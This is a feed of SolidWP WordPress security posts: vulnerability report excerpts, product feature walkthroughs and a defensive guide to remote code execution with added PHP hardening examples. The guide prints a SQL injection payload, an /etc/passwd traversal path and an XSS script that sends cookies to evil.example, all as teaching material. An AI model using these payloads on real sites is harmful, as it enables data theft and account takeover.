HT Easy GA4 – Google Analytics WordPress Plugin
- Plugin Slug: ht-easy-google-analytics
- Installations: 6,000+
- Vulnerability: Broken Access Control
- Patched in Version: No Fix
- Severity Score: Medium
- CVE: CVE-2024-1176
The post WordPress Vulnerability Report — March 13, 2024 appeared first on SolidWP.
Additionally, there are 13 plugin vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
Every WordPress site needs security, backups, and management tools. That’s Solid Suite — an integrated bundle of three plugins: Solid Security, Solid Backups, and Solid Central. You also get access to Solid Academy’s learning resources for WordPress professionals. Build your next WordPress website on a solid foundation with Solid Suite!
The post Solid Security Pro Feature Spotlight: Trusted Devices appeared first on SolidWP.
All of the features in Solid Security Pro are designed to help you lock down, secure, and protect your WordPress site. In this post, we highlight the Trusted Devices feature in Solid Security Pro and share a bit about why we built it, who it is for, and how to use it.
The Trusted Devices feature in the Solid Security Pro plugin identifies the devices that you and other users use to log in to your WordPress site. Once a user's devices are known, a session that suddenly shows up on a different device can be treated as suspect, which is how the feature limits the damage a session hijacker or other bad actor can do.
When a user logs in from an unrecognized device, Trusted Devices can restrict their administrator-level capabilities until the device is confirmed. So even if an attacker gets into the backend of your WordPress site with a stolen session or password, they cannot make the high-impact changes (uploading plugins, editing user accounts, and so on) that those capabilities allow.
Solid Security Pro also emails you when someone logs in to your site from an unrecognized device. The email includes an option to block that device.
Let’s unpack three big reasons you need Trusted Devices to protect your WordPress site.
Let’s say you follow all of the WordPress security best practices to protect your user account. Not only do you use a unique, strong password for every site, but you also lock down all of your online accounts with two-factor authentication. You are a good example of what it looks like to take WordPress security seriously.
Yet, even with all of the security measures you put into place, somehow, your website was still hacked. And, to make matters worse, the attacker used your WordPress user account to hack the site. How did this happen to you?
Unfortunately, even if you do everything right to secure your WordPress user account, there are still methods that hackers can use to exploit your account that are related to other software you may be using.
For example, WordPress sets a session cookie in your browser every time you log in to your website. Now suppose you run a browser extension that its developer has abandoned, so it no longer receives security updates, and that extension has a vulnerability that lets an attacker read your browser's cookies, including that WordPress session cookie. This is session hijacking: the attacker never needs your password or your second factor, because they simply reuse your already-authenticated session and start making changes as your WordPress user.
Pretty crummy, right? We agree, so we created a way to protect your account even when bad actors find and exploit a vulnerability somewhere else. That's where Trusted Devices comes in. With the Solid Security Pro plugin, you identify the devices that you and other users use to log in to your WordPress site. Logins from unrecognized devices are restricted until the device is confirmed, and you can block them outright, adding another strong layer of security to your site.
The primary benefit of Trusted Devices is that it takes the value out of a hijacked session. If a user's device changes in the middle of a session, Solid Security automatically logs the user out to prevent unauthorized activity on the account, such as changing the user's email address or uploading malicious plugins.
To get started with Trusted Devices, navigate to the security settings Features menu in your WordPress admin dashboard. From this screen, enable Trusted Devices. After enabling Trusted Devices, click the settings cogwheel.
In the Trusted Devices settings, enable the Restrict Capabilities and Session Hijacking Protection features.
Click the User Groups link to enable Trusted Devices for specific users.
After enabling the new Trusted Devices setting, users will receive a notification in the WordPress admin bar about pending unrecognized devices. If your current device hasn’t been added to the trusted devices list, click the Confirm This Device link to send the authorization email.
Click the Confirm Device button in the Unrecognized Login email to add your current devices to the Trusted Devices list.
Additionally, you have the option to sign up for some third-party APIs to improve the accuracy of Trusted Devices identification and to use static image maps to display the approximate location of an unrecognized login. Check the Trusted Devices settings to see which integrations are available.
We didn’t think it was fair for you to do all the work to secure your website, just for some hacker to find a vulnerability loophole. The Trusted Devices feature in Solid Security Pro allows you to restrict access to your site’s backend to a list of approved devices. Now that is awesome!
Solid Security, our WordPress security plugin, gives you 30+ ways to secure and protect your WordPress site. On average, 30,000 new websites are hacked each day. WordPress sites can be an easy target for attacks because of plugin vulnerabilities, weak passwords, and obsolete software.
Most WordPress admins don’t know they’re vulnerable, but Solid Security works to lock down WordPress, fix common holes, stop automated attacks, and strengthen user credentials. With advanced features for experienced users, our WordPress security plugin can help harden WordPress.
The post Solid Backups Maintenance Release 9.1.10 appeared first on SolidWP.
The 9.1.10 release is available now via automatic updates in WordPress sites where Solid Backups is installed. You may also download it from your SolidWP member panel at my.solidwp.com.
The post Solid Central Streamlines Site Management with New Tagging Feature appeared first on SolidWP.
In your Solid Central Dashboard, click the drop-down arrow for the site you wish to add a tag to.
Click on the Tags tab.
Click the Edit icon.
A pop-up will appear. Click on Create a new tag.
Enter the Tag Name and Description if applicable. Choose a color for your tag and click Save.
You will now see the tag(s) associated with that site.
To search for sites with a particular tag, click Filter Websites. Then choose the tag(s) you want to filter. Only sites with the tags you chose will be listed.
Solid Central lets you manage multiple websites with ease. And the latest update marks a significant leap forward in site management capabilities. With the enhanced tagging and filtering features, brands overseeing a multitude of connected sites can now streamline their workflow like never before. This dynamic enhancement not only boosts efficiency but also provides a more intuitive and user-friendly experience.
The post WordPress Vulnerability Report — March 6, 2024 appeared first on SolidWP.
Additionally, there are 49 plugin and theme vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
Every WordPress site needs security, backups, and management tools. That’s Solid Suite — an integrated bundle of three plugins: Solid Security, Solid Backups, and Solid Central. You also get access to Solid Academy’s learning resources for WordPress professionals. Build your next WordPress website on a solid foundation with Solid Suite!
The post Solid Backups Maintenance Release 9.1.9 appeared first on SolidWP.
The 9.1.9 release is available now via automatic updates in WordPress sites where Solid Backups is installed. You may also download it from your SolidWP member panel at my.solidwp.com.
The post WordPress Vulnerability Report — February 28, 2024 appeared first on SolidWP.
Additionally, there are 25 plugin vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
The post Remote Code Execution: A Guide For WordPress Users appeared first on SolidWP.
If you’re serious about your website’s security, then it’s time to learn about the dangers of remote code execution vulnerabilities and how you can combat them.
Remote code execution (RCE) is an umbrella term for several different attack techniques, but they all have one thing in common: the attacker ends up running code of their choosing on a system they don't own. RCE, often grouped with code injection, is an increasingly common way for hackers to compromise websites of all kinds, including sites that run WordPress as their content management system.
In this guide, we’ll explain in detail what a remote code execution attack looks like, and the steps you need to take to avoid one. Let’s take a look.
Remote Code Execution (RCE) is a class of vulnerability that lets an attacker run code of their choosing on a computer or server owned by someone else, and through that code read or change the data it holds.
During an RCE attack, the attacker takes over the server by getting it to execute a payload they supply, such as a web shell, a backdoor, or other malware, which then runs with the permissions of the compromised application.
A remote code execution attack is carried out without the authority of the hardware owner, and it doesn't matter where in the world the server is located.
It may be helpful to think of remote code execution attacks as something like a termite infestation. The metaphor isn't exact, and in one respect an RCE attack is worse: unlike a termite, which has to be at your house (or in it), a hacker can reach your website from anywhere.
The fact is, RCE attacks are incredibly dangerous because hackers can execute any malicious code on a vulnerable server.
There’s really no limit to the damage a skilled RCE hacker can do to your WordPress site if they gain access to it.
In 2018, Microsoft disclosed a remote code execution vulnerability found in the software program, Excel. An attacker could exploit the vulnerability to run arbitrary code in the current user’s context.
If the current user was logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts were configured to have fewer user rights on the system could be less impacted than those with administrative user rights.
To better understand RCE, you need to be aware of the vulnerability classes that most often lead to it. Strictly speaking, the three classes below (SQL injection, cross-site scripting, and directory traversal) are distinct injection flaws rather than remote code execution itself, but each one can be a step toward running attacker-controlled code on your server or in your visitors' browsers, which is why this guide groups them together:
Your WordPress website uses a MySQL database to operate. SQL injection occurs when text supplied by a visitor is pasted directly into a SQL query, so the attacker can change what the query does and read or modify your website data.
With a SQL injection, an attacker may be able to create a new admin-level user account, which can then be used to log in and get full access to your WordPress website. SQL injections can also insert new data into your database, including links to malicious or spam websites.
Many injection vulnerabilities target the way SQL statements are built. As an example, if an application needs to look up a user by name, a developer might make the mistake of building the query by concatenating the visitor's input into the SQL text:
SELECT * FROM users WHERE name = 'username'
Where is the problem? Any visitor to your WordPress site, including one with bad intent, controls the username. If the attacker enters ' OR '1'='1' -- as the name, the SQL statement becomes:
SELECT * FROM users WHERE name = '' OR '1'='1' --'
The first quote in the input closes the string early, OR '1'='1' is a condition that is always true, and -- starts a comment that swallows the dangling quote at the end. Instead of matching one user, the WHERE clause matches every row, and the attacker is handed every username in the table.
A data leak like this isn't the only danger of SQL injection. Depending on the database configuration, an attacker can also append further commands that overwrite or delete crucial WordPress site data.
Cross-site scripting (XSS) is another vulnerability class this guide groups with RCE. It differs from the others in that the injected code runs in your visitors' browsers rather than on your server. XSS is the most commonly disclosed vulnerability class in WordPress plugins, so it is a frequent entry point for attacks on WordPress sites.
Within a web page, code and content travel together in the same HTML. A browser tells them apart by markup: anything inside script tags (and a handful of other places, such as event-handler attributes) is treated as code. Without proper filtering or escaping, an attacker can place a script tag into any spot on a page where their text is echoed back.
That includes search boxes (which often appear on every page of your WordPress site), comment sections, and even display names.
When the page is rendered, the visitor's browser runs the injected code exactly as if it were part of your site.
Cross-site scripting wouldn't be much of a security issue if the code only ran in the attacker's own browser. But when the malicious input is stored and shown to the public, such as in the comment section of a blog post, it runs for every visitor who views that content.
With the ability to run script in a visitor's browser, an attacker can steal session cookies or captured credentials and impersonate legitimate users, including logged-in administrators.
They can also read whatever that user can see on the page, which may include personal information such as payment or account details.
Directory traversal isn't aimed at an application's visitors; its target is the files on your web server.
The vulnerability abuses how the site's files are laid out in the server's file system.
Normally, the site lives in a standard directory such as /home/user/public_html. Scripts in that directory refer to files with relative paths, so wp-admin/index.php means /home/user/public_html/wp-admin/index.php.
When a script needs a file outside the current directory, it reaches it by including ../ in the path, which refers to the directory one level above the current one.
For example, /home/user/public_html/../ resolves to /home/user/.
If a script reads or writes files using a name the visitor controls, an attacker can walk up the tree with a name such as ../../../../../../../../../etc/passwd.
Without input validation, the attacker can read sensitive files outside the web root, including configuration files that hold database credentials, which is bad news for your site security.
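The check that closes off the traversal described above, as an added example written for this page (it is not code from the original post or from Solid Security): the visitor's file name is resolved against a fixed base directory and refused if it lands anywhere else. The demo directory and file are created under the system temp directory so the script runs stand-alone; the paths and the "images/logo.png" fixture are constructed for the demo.

```php
<?php
// Added example, not code from the original post: resolve a visitor-supplied
// file name against a fixed base directory and refuse anything that ends up
// outside it. The demo directory and file are created under the system temp
// directory so the script runs stand-alone; the paths are illustrative.
function resolveInsideBase(string $base, string $userPath): ?string
{
    $realBase = realpath($base);
    if ($realBase === false) {
        return null;                      // base directory itself is missing
    }
    // realpath() collapses every "../" and resolves symlinks, so the check is
    // made on where the path really lands, not on the string the visitor sent.
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null;                      // does not exist or cannot be resolved
    }
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if ($candidate !== $realBase && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                      // resolved to somewhere above the base
    }
    return $candidate;
}

// Constructed fixture: a fake uploads directory containing one file.
$base   = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'traversal-demo-' . getmypid();
$images = $base . DIRECTORY_SEPARATOR . 'images';
mkdir($images, 0700, true);
file_put_contents($images . DIRECTORY_SEPARATOR . 'logo.png', 'not a real png');

$requests = [
    'images/logo.png',                          // legitimate request
    'images/../images/logo.png',                // wanders but stays inside
    '../../../../../../../../../etc/passwd',    // the traversal from the text
    '../',                                      // the parent of the base directory
];
foreach ($requests as $req) {
    $resolved = resolveInsideBase($base, $req);
    printf("%-45s => %s\n", $req, $resolved === null ? 'REJECTED' : 'OK ' . $resolved);
}

// Tidy up the fixture.
unlink($images . DIRECTORY_SEPARATOR . 'logo.png');
rmdir($images);
rmdir($base);
```

Because realpath() only resolves paths that exist, apply the same check to the target's parent directory when the file is about to be written (an upload), and build the final name with basename() so the visitor cannot smuggle separators into it. When only a flat file name is expected, rejecting anything that contains a slash or ".." is simpler still; WordPress core ships validate_file() for exactly that test.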
The detailed information in this guide isn’t meant to intimidate or cause you any fear. Rather, it’s intended to highlight the increasing importance of having the most robust WordPress site security measures running at all times.
It also serves as a reminder to keep your plugins updated to ensure they are not open to new RCE vulnerabilities.
The vast majority of RCE attacks can be mitigated or stopped completely just by being aware and prepared before they happen. As WordPress site owners, it’s important to anticipate and understand how our site servers process the information that our users provide.
The number one way to keep your site safe from RCE vulnerabilities is defense in depth: several independent layers of protection, so that if one line of defense fails you are still protected from the attack.
With that said, let’s look at some of the most important steps you should take to prevent these malicious and often dangerous attacks. Several factors can make your WordPress site more vulnerable to successful attacks.
To get started securing and protecting your site, download and install the Solid Security Pro plugin.
Simply put: You’re putting yourself at risk for an attack if you are running outdated versions of WordPress, plugins, and themes on your website. Version updates often include patches for security issues in the code, including remote code execution (RCE) vulnerabilities, so it’s important always to run the latest version of all software installed on your WordPress website.
Updates will appear in your WordPress dashboard as soon as they’re available. Make it a habit to take a backup and then run all available updates every time you log in to your WordPress site. Running updates may seem inconvenient or tiresome, but it’s an important WordPress security best practice.
It is hard to keep track of every disclosed WordPress vulnerability (we track and share them in our WordPress Vulnerability Roundups) and to compare that list against the versions of the plugins and themes installed on your website. Hackers, however, do exactly that: they target plugins and themes with known vulnerabilities. Having software with a known vulnerability installed on your site gives them the blueprint they need to take over your website.
The Version Management feature in the Solid Security Pro plugin allows you to auto-update WordPress, plugins, and themes. Beyond that, Version Management also has options to harden your website when it is running outdated software and to scan for old WordPress sites.
To get started using Version Management, enable the module on the main page of the security settings.
Now click the Down Arrow to take a closer look at the settings, all designed to protect your site.
Now, let’s take a closer look at configuring plugin and theme updates. Before we get started, a quick reminder: enabling the plugin and theme update settings disables the WordPress auto-update feature to prevent conflicts.
Both the Plugin and Theme Update Settings have three choices.
Now let’s take a closer look at the Custom option.
Selecting the Custom option provides three different choices for your plugin and theme updates. As we can see, the Custom auto-updates setting offers a lot more flexibility than WordPress’s on or off auto-update option.
The Solid Security Pro Site Scanner is another way to protect your WordPress website from one of the leading causes of site compromises: outdated plugins and themes with known vulnerabilities. The Site Scanner checks your site for known vulnerabilities and can automatically apply a patch if one is available.
To enable the Site Scan on new installs, navigate to the Solid Security Pro settings, select Features, and click the Enable toggle on the Site Check settings module.
To trigger a manual Site Scan, click on Site Scans and then the Start Site Scan button located at the top right of the screen.
The Site Scan results will display.
If the Site Scan detects a vulnerability, click the vulnerability link to view the details page.
On the Site Scan vulnerability page, you will see if there is a fix available for the vulnerability. If there is a patch available, you can click the Update Plugin button to apply the fix on your website.
There can be a delay between when a patch is available and the Solid Security Vulnerability Database getting updated to reflect the fix. In this case, you can mute the notification to not receive any more alerts related to the vulnerability.
You should also have session hijacking protection in place for the Admins and Editors on your WordPress website. A stolen administrator session is one of the easiest routes to code execution, because an administrator can upload a plugin or edit theme files, so limiting what an unrecognized device can do closes off that route.
The Solid Security Pro Trusted Devices feature makes Session Hijacking a thing of the past. If a user’s device changes during a session, Solid Security will automatically log the user out to prevent any unauthorized activity on the user’s account, such as changing the user’s email address or uploading malicious plugins.
The Trusted Devices feature in Solid Security Pro identifies the devices that you and other users use to log in to your WordPress site. After your devices are identified, we can stop session hijackers and other bad actors from doing any damage on your website.
When a user has logged in on an unrecognized device, Trusted Devices can restrict their administrator-level capabilities. This means that if an attacker were able to break into the backend of your WordPress site, they wouldn’t have the ability to make any malicious changes to your website.
To start using Trusted Devices, enable them on the main page of the security settings, and then click the Configure Settings button.
In the Trusted Devices settings, decide which users you want the feature to apply to, and enable the Restrict Capabilities and Session Hijacking Protection features.
After enabling the new Trusted Devices setting, users will receive a notification in the WordPress admin bar about pending unrecognized devices. If your current device hasn’t been added to the trusted devices list, click the Confirm This Device link to send the authorization email.
Click the Confirm Device button in the Unrecognized Login email to add your current devices to the Trusted Devices list.
Once Trusted Devices is enabled, users can manage devices from their WordPress User Profile page. From this screen, you can approve or deny devices from the Trusted Devices list.
Additionally, you have the option to sign up for some third-party APIs to improve the accuracy of the Trusted Devices identification and to use static image maps to display the approximate location of an unrecognized login. Check out the Trusted Devices setting to see what integrations are available.
Two-factor authentication is a process of verifying a person’s identity by requiring two separate methods of verification. Google shared on its blog that using two-factor authentication can stop 100% of automated bot attacks. Not bad odds!
The Solid Security plugin allows you to activate two-factor authentication for your WordPress site so users must enter a secondary code to log in.
The three two-factor authentication methods provided by Solid Security Pro include:
To start using Two-Factor Authentication on your website, enable the feature on the main page of the Solid Security Pro settings.
Follow the steps here to continue setting up two-factor authentication for your WordPress site. If you followed our recommendations and enabled the force requirements for privileged users, the next thing you will see is the place to enter the two-factor token.
Escaping works well as a first line of defense against XSS and the other injection flaws that can lead to RCE. However, browsers and servers interpret code in more contexts than script tags, such as HTML attributes, URLs, and inline styles, and each context has its own escaping rules.
Keeping track of every one of them on your own would be complicated and would eat a lot of your time and resources.
Fortunately, application developers have put a lot of thought into the problem of injection vulnerabilities.
It’s best to use a trusted and reputable CMS (content management system) like WordPress, because escaping and sanitizing helpers are built right into the platform and are used by the well-maintained themes and plugins that run on it.
It’s always essential you keep all software applications and plugins up-to-date when new versions are released. When vulnerabilities are uncovered, software developers will work around the clock to stay ahead of the weaknesses they discover.
This is true for both plugin and theme authors.
Whether you run WordPress or a custom CMS, the reliable protection against SQL injection is the parameterized (prepared) query. With a parameterized query, the SQL text, with placeholders where values belong, is sent to the database separately from the values themselves. The database parses the statement first and then binds the values as data, so a quote or comment marker inside a value can never change the structure of the query. WordPress provides $wpdb->prepare() for the same purpose in plugin and theme code.
In the above example, a parameterized query would look like this:
$stmt = $db->prepare("SELECT * FROM users WHERE name = ?"); // $db is a PDO connection
$stmt->execute(["' OR '1'='1' --"]);                          // the input is bound as data, not SQL
$results = $stmt->fetchAll();
In this scenario the database treats ' OR '1'='1' -- purely as a string of text to compare against the name column, finds that no user has that name, and returns nothing.
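The injection walked through in the SQL injection section above and the parameterized fix just shown, as one runnable added example written for this page (it is not code from the original post or from Solid Security). It builds a throwaway in-memory SQLite database through PDO (so PHP needs the pdo_sqlite extension), fills it with three constructed rows, and runs the same lookup both ways. The $wpdb->prepare() line in the comment is the WordPress equivalent, not something this script calls.

```php
<?php
// Added example, not code from the original post: the lookup from the SQL
// injection section, run once with string concatenation and once with a bound
// parameter, against a throwaway in-memory SQLite database (needs pdo_sqlite).
// Table layout and the three sample rows are constructed for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$insert = $db->prepare('INSERT INTO users (name) VALUES (?)');
foreach (['alice', 'bob', 'carol'] as $name) {
    $insert->execute([$name]);
}

// Vulnerable: the visitor's text is spliced into the SQL, so it IS SQL.
function findUserVulnerable(PDO $db, string $name): array
{
    $sql = "SELECT * FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the statement is parsed first, then the value is bound as data.
// WordPress plugin code gets the same effect with
//   $wpdb->get_results( $wpdb->prepare( "SELECT * FROM {$wpdb->users} WHERE user_login = %s", $name ) );
function findUserSafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT * FROM users WHERE name = ?');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "' OR '1'='1' --";
// With concatenation the query text becomes
//   SELECT * FROM users WHERE name = '' OR '1'='1' --'
// The OR is always true and "--" comments out the stray quote, so every row matches.
printf("concatenated query:            %d row(s)\n", count(findUserVulnerable($db, $payload)));
printf("parameterized query:           %d row(s)\n", count(findUserSafe($db, $payload)));
printf("parameterized lookup of 'bob': %d row(s)\n", count(findUserSafe($db, 'bob')));
```

Run from the command line, the concatenated query returns every user while the parameterized query returns no rows for the payload and exactly one for a real name; the difference is entirely in whether the visitor's text reaches the database as SQL or as a value.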
The best place to begin preventing RCE vulnerabilities is where your site users interact with your application.
The simplest method is to strip or reject characters that have no business in the input (a username, for example, has no need for angle brackets).
Another option, which preserves the content, is escaping it on output.
If you’re not familiar with escaping, it’s the process of telling the browser to treat something that looks like code as plain text. For example, instead of emitting a literal <script> tag, you emit &lt;script&gt;.
The browser then displays the less-than (<) and greater-than (>) symbols at that spot on the page, but it does not treat the text between them as code.
To the reader the text looks exactly the same; the only difference is that it is never executed.
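Escaping in practice, as an added example written for this page (not code from the original post or from Solid Security): the same attacker-controlled comment is escaped for three output contexts, because the entity replacement described above is right for HTML text but not, on its own, for a script block or a URL. The comment string is constructed for the demo; the helpers wrap plain PHP functions so the script runs without WordPress, and the WordPress functions that do the same job are named in the comments.

```php
<?php
// Added example, not code from the original post: one attacker-controlled
// string escaped for three different output contexts. The comment text is
// constructed; the helpers wrap plain PHP functions, with the WordPress
// functions that do the same job named in the comments.
$comment = '<script>location="https://evil.example/?c="+document.cookie</script>';

// HTML body text or a quoted attribute value: <, >, &, " and ' become entities.
// WordPress: esc_html() for body text, esc_attr() for attribute values.
function escHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inside an inline <script>: emit a JSON string literal with the HTML-sensitive
// characters hex-escaped, so an embedded "</script>" cannot end the block early.
// WordPress: wp_json_encode() with the same flags (esc_js() is for attributes).
function escJs(string $text): string
{
    return json_encode($text, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Inside a URL query parameter: percent-encode the value, then escape the whole
// URL as an attribute. WordPress: rawurlencode() for the value, esc_url() for the URL.
function escUrlParam(string $text): string
{
    return rawurlencode($text);
}

// Unescaped: the browser finds a genuine <script> element and executes it.
echo "<p>$comment</p>\n\n";

// Escaped per context: the browser shows the text and never parses it as code.
echo '<p>' . escHtml($comment) . "</p>\n";
echo '<input type="text" value="' . escHtml($comment) . "\">\n";
echo '<script>var lastComment = ' . escJs($comment) . ";</script>\n";
echo '<a href="' . escHtml('/search?q=' . escUrlParam($comment)) . "\">search again</a>\n";
```

Two habits make the helpers hold up: always quote attribute values (entity encoding does not rescue an unquoted attribute), and escape at the moment of output rather than on the way into the database, so the stored comment stays intact and can be rendered safely in any context later.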
There may be rare instances where a zero-day RCE vulnerability arises: a flaw that attackers are exploiting before you, the CMS developers, or the plugin authors know it exists.
Even in a case such as this, we’re still able to limit the damage that an attacker can do by setting up some simple rules about what an application is able to do.
For example, imagine you’re designing an application that reads from a database. It really wouldn’t be necessary to give the new application the ability or permission to delete or write database records.
In this case, even if attackers try to compromise the script, they’ll encounter an error and fail at their attempt.
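What that looks like at the database layer, as an added configuration example for MySQL/MariaDB written for this page (not taken from the original post): a separate account for the read-only component, granted nothing beyond SELECT on the tables it needs. The database, table, user, host and password values are placeholders.

```sql
-- Added example, not from the original post: a MySQL/MariaDB account for a
-- reporting script that only ever reads posts. Database, table, user, host and
-- password are placeholders.
CREATE USER 'wp_readonly'@'localhost' IDENTIFIED BY 'replace-with-a-long-random-password';
GRANT SELECT ON wordpress_db.wp_posts    TO 'wp_readonly'@'localhost';
GRANT SELECT ON wordpress_db.wp_postmeta TO 'wp_readonly'@'localhost';
-- No INSERT, UPDATE, DELETE, DROP or FILE privilege: if the script is tricked into
-- running "DELETE FROM wp_posts", the server answers with an access-denied error.
```

The WordPress core account still needs write access to its own tables, so this applies to the custom scripts, reporting jobs and integrations you add around the site, each with credentials of its own.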
The least privilege principle is also useful as it relates to PHP functions.
PHP functions are a standard target for attackers of all kinds. Powerful functions that your site doesn’t need, such as ini_set() (which changes PHP settings from within a script) or exec() (which runs a shell command passed as text), should be disabled.
This prevents hackers and attackers from using them for malicious purposes.
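The setting that does this, as an added configuration example written for this page (not from the original post): a php.ini entry listing the shell-execution functions a typical WordPress site never calls. The list is a starting point, not a prescription.

```ini
; Added example, not from the original post: php.ini (or a php-fpm pool's
; php_admin_value, or .user.ini on shared hosting) entry disabling the
; shell-execution functions a typical WordPress site never calls.
; Trim the list to what your plugins actually need; test on staging first.
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
```

disable_functions can only be set in the server configuration, not from a running script, so an attacker who gains code execution cannot switch it back on with ini_set(). ini_set() itself can be added to the list, but many plugins call it legitimately, so check the consequences on a staging copy before doing that in production.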
This idea applies to securing the public-facing areas of your website and the server-side code.
Content-Security-Policy (CSP) is an HTTP response header honored by all modern browsers. It tells the browser which sources of content it may load for your page. By sending the header from your application or web server, you specify which scripts are allowed to run and where they may be loaded from.
Used well, this stops injected scripts from executing even when an XSS flaw lets an attacker put them on the page.
Another option is to keep scripts from reading your authentication cookies and to keep the browser from sending those cookies on requests that originate from other sites.
The first is done by setting the cookie with the HttpOnly attribute, the second with SameSite=Strict (or Lax). Even if an attacker’s code does run on your WordPress site, it cannot read your users’ authentication cookies, and a request forged from another site does not carry them.
This significantly reduces the potential damage of an XSS or remote code execution attack on your WordPress site.
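Both headers together, as an added example written for this page (not code from the original post or from Solid Security): a per-response nonce goes into the Content-Security-Policy so only scripts your templates mark are allowed to run, and the cookie is set with the attributes described above. The cookie name, the cookie value, and the policy's allow-list are placeholders to adapt to your site; the setcookie() options array needs PHP 7.3 or later.

```php
<?php
// Added example, not code from the original post: send a Content-Security-Policy
// with a per-response nonce and set an authentication cookie with the HttpOnly,
// Secure and SameSite attributes. The cookie name and the policy's allow-list are
// placeholders to adapt to your site. Needs PHP 7.3+ for the setcookie() options array.
function cspNonce(): string
{
    static $nonce = null;                 // one fresh nonce per response
    if ($nonce === null) {
        $nonce = base64_encode(random_bytes(16));
    }
    return $nonce;
}

function cspHeaderValue(string $nonce): string
{
    // Scripts run only if they come from this origin or carry the nonce.
    // An injected <script> tag or onclick= handler has neither, so it is blocked.
    return implode('; ', [
        "default-src 'self'",
        "script-src 'self' 'nonce-$nonce'",
        "object-src 'none'",
        "base-uri 'self'",
        "frame-ancestors 'none'",
    ]);
}

function sendSecurityHeaders(): void
{
    header('Content-Security-Policy: ' . cspHeaderValue(cspNonce()));
    header('X-Content-Type-Options: nosniff');
}

function setAuthCookie(string $name, string $value): bool
{
    return setcookie($name, $value, [
        'expires'  => 0,                  // session cookie
        'path'     => '/',
        'secure'   => true,               // HTTPS only
        'httponly' => true,               // invisible to document.cookie, so XSS cannot read it
        'samesite' => 'Strict',           // not attached to requests that start on another site
    ]);
}

if (PHP_SAPI === 'cli') {
    // No HTTP response on the command line; show the policy and a nonced script tag.
    echo 'Content-Security-Policy: ' . cspHeaderValue(cspNonce()) . "\n";
    echo '<script nonce="' . htmlspecialchars(cspNonce(), ENT_QUOTES) . '">/* runs */</script>' . "\n";
    echo '<script>/* injected without the nonce: blocked by the policy */</script>' . "\n";
} else {
    sendSecurityHeaders();
    setAuthCookie('demo_auth', bin2hex(random_bytes(16)));
    echo '<script nonce="' . htmlspecialchars(cspNonce(), ENT_QUOTES) . '">/* runs */</script>';
}
```

WordPress already sets its own authentication cookies with HttpOnly, so the cookie half of this mostly matters for cookies your own code or plugins add. The policy half takes more care: themes and plugins routinely emit inline scripts, so roll it out as Content-Security-Policy-Report-Only first, watch the violation reports, and switch to the enforcing header once every legitimate script carries the nonce.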
Don’t worry if you’re feeling a bit overwhelmed when you discover the potential security threats seeking out your WordPress site. The truth is that the threats are many, but the solutions can be simple.
We hope this guide helped you understand the risk of RCE attacks on your WordPress site. By implementing a few WordPress security best practices, along with the 5 steps above, you’ll have a better line of defense.
The post WordPress Vulnerability Report — February 21, 2024 appeared first on SolidWP.
Additionally, there are 20 plugin vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
The post Solid Security Pro Feature Spotlight – Two-Factor Authentication appeared first on SolidWP.
In the Feature Spotlight posts, we highlight a feature in Solid Security Pro and share a bit about why we developed the feature, who the feature is for, and how to use the feature.
Today, we are going to cover Two-Factor Authentication, a proven method to secure and protect your WordPress site.
According to the Verizon Data Breach Investigations Report, over 70% of employees reuse passwords at work. But the most important stat from the report is that “81% of hacking-related breaches leveraged either stolen or weak passwords.”
The “Collection #1″ data breach that was hosted on MEGA contained 1,160,253,228 unique combinations of email addresses and passwords. A haul like that gives a malicious bot more than a billion sets of credentials to try against login forms. A brute force attack is a trial-and-error method for discovering username and password combinations; trying leaked credentials this way is known as credential stuffing.
All of these reasons and more should make you want to add another layer of protection to your WordPress login.
